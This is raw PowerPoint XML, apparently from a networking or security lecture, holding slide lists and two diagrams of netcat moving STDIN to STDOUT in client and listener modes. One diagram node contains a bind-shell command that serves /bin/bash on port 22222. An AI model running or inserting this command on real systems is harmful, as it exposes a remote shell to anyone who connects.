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526" r:id="rId2"/>
    <p:sldId id="527" r:id="rId3"/>
    <p:sldId id="433" r:id="rId4"/>
    <p:sldId id="435" r:id="rId5"/>
    <p:sldId id="436" r:id="rId6"/>
    <p:sldId id="437" r:id="rId7"/>
    <p:sldId id="438" r:id="rId8"/>
    <p:sldId id="439" r:id="rId9"/>
    <p:sldId id="440" r:id="rId10"/>
    <p:sldId id="445" r:id="rId11"/>
    <p:sldId id="446" r:id="rId12"/>
    <p:sldId id="441" r:id="rId13"/>
    <p:sldId id="442" r:id="rId14"/>
    <p:sldId id="443" r:id="rId15"/>
    <p:sldId id="447" r:id="rId16"/>
    <p:sldId id="448" r:id="rId17"/>
    <p:sldId id="450" r:id="rId18"/>
    <p:sldId id="451" r:id="rId19"/>
    <p:sldId id="452" r:id="rId20"/>
    <p:sldId id="454" r:id="rId21"/>
    <p:sldId id="455" r:id="rId22"/>
    <p:sldId id="456" r:id="rId23"/>
    <p:sldId id="449" r:id="rId24"/>
    <p:sldId id="457" r:id="rId25"/>
    <p:sldId id="528" r:id="rId26"/>
    <p:sldId id="529" r:id="rId27"/>
    <p:sldId id="530" r:id="rId28"/>
    <p:sldId id="532" r:id="rId29"/>
    <p:sldId id="41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74" autoAdjust="0"/>
    <p:restoredTop sz="49793" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="50" d="100"/>
          <a:sy n="50" d="100"/>
        </p:scale>
        <p:origin x="-2432" y="-112"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="18" y="300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396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415DA5-B641-AE47-B152-0640D50A7719}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{993A5793-FE76-3249-8156-E78426EB7FB3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" type="parTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" type="sibTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
            <a:t>Netcat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
            <a:t>Client</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            <a:t> Mode</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            <a:t>(Initiates Connection)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA574525-CEAC-764C-8294-27D07CC525CA}" type="parTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" type="sibTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A37399DC-1B66-E241-AA91-521795EF125F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" type="parTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60F005BB-4952-1243-89BB-71159DDC310C}" type="sibTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" type="pres">
      <dgm:prSet presAssocID="{75415DA5-B641-AE47-B152-0640D50A7719}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" type="pres">
      <dgm:prSet presAssocID="{993A5793-FE76-3249-8156-E78426EB7FB3}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" type="pres">
      <dgm:prSet presAssocID="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="258070" custScaleY="233333" custLinFactNeighborX="1716">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87617A52-A78B-1D42-A58C-2105C55BC513}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" type="pres">
      <dgm:prSet presAssocID="{A37399DC-1B66-E241-AA91-521795EF125F}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{7E4F7820-9126-F34A-AE5E-86C6616D83B5}" type="presOf" srcId="{993A5793-FE76-3249-8156-E78426EB7FB3}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{8FE9B798-11E2-554A-AEEE-42A8DA035CD9}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{1AAF0C35-D12F-AB47-89A6-142F44914F7E}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{F87BC786-C048-4947-96F7-950D116B3673}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{28296646-6175-D942-A8E4-C91800AAED1F}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" srcOrd="1" destOrd="0" parTransId="{CA574525-CEAC-764C-8294-27D07CC525CA}" sibTransId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}"/>
    <dgm:cxn modelId="{9F8853BA-9300-6742-B67E-E9BD33539B96}" type="presOf" srcId="{A37399DC-1B66-E241-AA91-521795EF125F}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{993A5793-FE76-3249-8156-E78426EB7FB3}" srcOrd="0" destOrd="0" parTransId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" sibTransId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}"/>
    <dgm:cxn modelId="{C922FB42-297B-A649-9488-6F99795E4F96}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{A37399DC-1B66-E241-AA91-521795EF125F}" srcOrd="2" destOrd="0" parTransId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" sibTransId="{60F005BB-4952-1243-89BB-71159DDC310C}"/>
    <dgm:cxn modelId="{9D588B07-8EAC-D140-B7CE-95CE48A8F2F7}" type="presOf" srcId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{8AEC82C1-80FF-2740-985B-6209B221671B}" type="presOf" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{B8C292E0-0F1B-B342-8FA4-16BC0F01A8A5}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{10B90AE7-EF8B-6F45-BD1A-3DB28FD4DCD2}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{4C9A13E7-EAB1-8F4B-B415-23367B27A027}" type="presParOf" srcId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" destId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{6947CFF1-FE7B-CA41-AC04-DAB5E090F3E4}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{AFA7F1ED-F868-A24D-A510-F049B2579604}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{35FE322E-02BA-2D4B-867B-4D4134486592}" type="presParOf" srcId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{3D5A9033-CABA-0D47-9A4B-EF523E98721B}" type="presParOf" srcId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}"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5415DA5-B641-AE47-B152-0640D50A7719}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process2" loCatId="" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{993A5793-FE76-3249-8156-E78426EB7FB3}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Input</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDIN</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" type="parTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" type="sibTrans" cxnId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t>Listener mode</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
            <a:t>nc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t> –</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
            <a:t>lp</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t> 22222 </a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
            <a:t>–e/bin/bash</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA574525-CEAC-764C-8294-27D07CC525CA}" type="parTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" type="sibTrans" cxnId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A37399DC-1B66-E241-AA91-521795EF125F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Standard Output</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>STDOUT</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" type="parTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60F005BB-4952-1243-89BB-71159DDC310C}" type="sibTrans" cxnId="{C922FB42-297B-A649-9488-6F99795E4F96}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7474D507-A3B2-FB46-9DFE-2DB21343AD58}" type="pres">
      <dgm:prSet presAssocID="{75415DA5-B641-AE47-B152-0640D50A7719}" presName="linearFlow" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" type="pres">
      <dgm:prSet presAssocID="{993A5793-FE76-3249-8156-E78426EB7FB3}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AD777D4C-6ED0-D747-BC54-A8749DE32B39}" type="pres">
      <dgm:prSet presAssocID="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" type="pres">
      <dgm:prSet presAssocID="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3" custScaleX="258070" custScaleY="233333" custLinFactNeighborX="1716">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87617A52-A78B-1D42-A58C-2105C55BC513}" type="pres">
      <dgm:prSet presAssocID="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" type="pres">
      <dgm:prSet presAssocID="{A37399DC-1B66-E241-AA91-521795EF125F}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custScaleX="258070">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{147CC591-E8A2-084E-BB4A-34CB6F858692}" type="presOf" srcId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" destId="{6AD7177C-A549-E942-935A-4AF6E717C43A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{79984275-2B24-7E47-B2D5-FE4A795FE58E}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{87617A52-A78B-1D42-A58C-2105C55BC513}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{675FEDC7-F137-354A-B1D3-0480EB63502E}" type="presOf" srcId="{993A5793-FE76-3249-8156-E78426EB7FB3}" destId="{C2ED3040-1FBD-1B47-84CD-7BEDC30A8FB1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{700009C3-D656-2C48-B5F1-5C870FCD1F90}" type="presOf" srcId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}" destId="{F095C044-F9F7-A247-B584-70F97FA4CD8E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{2556A150-DFFE-E94E-912D-964D1A5C0D95}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{6CDCB18F-756F-C643-A5E8-E3954EE9FC05}" srcOrd="1" destOrd="0" parTransId="{CA574525-CEAC-764C-8294-27D07CC525CA}" sibTransId="{25B7A8F0-156C-DA43-B5BB-713A111FE085}"/>
    <dgm:cxn modelId="{ACE1444C-7BE0-8A44-88D5-5ACEB2D5D384}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{993A5793-FE76-3249-8156-E78426EB7FB3}" srcOrd="0" destOrd="0" parTransId="{29F4EB0E-0C6C-2942-B471-F286550C0A7D}" sibTransId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}"/>
    <dgm:cxn modelId="{21AFF275-5B1B-8044-B680-EDDD0A0E46A8}" type="presOf" srcId="{A37399DC-1B66-E241-AA91-521795EF125F}" destId="{6D81CD99-7440-A045-B5B9-8C0C76B202FF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
    <dgm:cxn modelId="{C922FB42-297B-A649-9488-6F99795E4F96}" srcId="{75415DA5-B641-AE47-B152-0640D50A7719}" destId="{A37399DC-1B66-E241-AA91-521795EF125F}" srcOrd="2" destOrd="0" parTransId="{AA8C94F1-DAC2-E44B-B4BC-2B45AE2456F3}" sibTransId="{60F005BB-4952-1243-89BB-71159DDC310C}"/>
    <dgm:cxn modelId="{43C08ACE-784E-7744-8188-C2E984A0DCD6}" type="presOf" srcId="{AC96AE19-B1D2-8F48-964E-7C80F109D327}" destId="{35B07F7E-B9D9-DF44-9B23-8D6547D7E0BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process2"/>
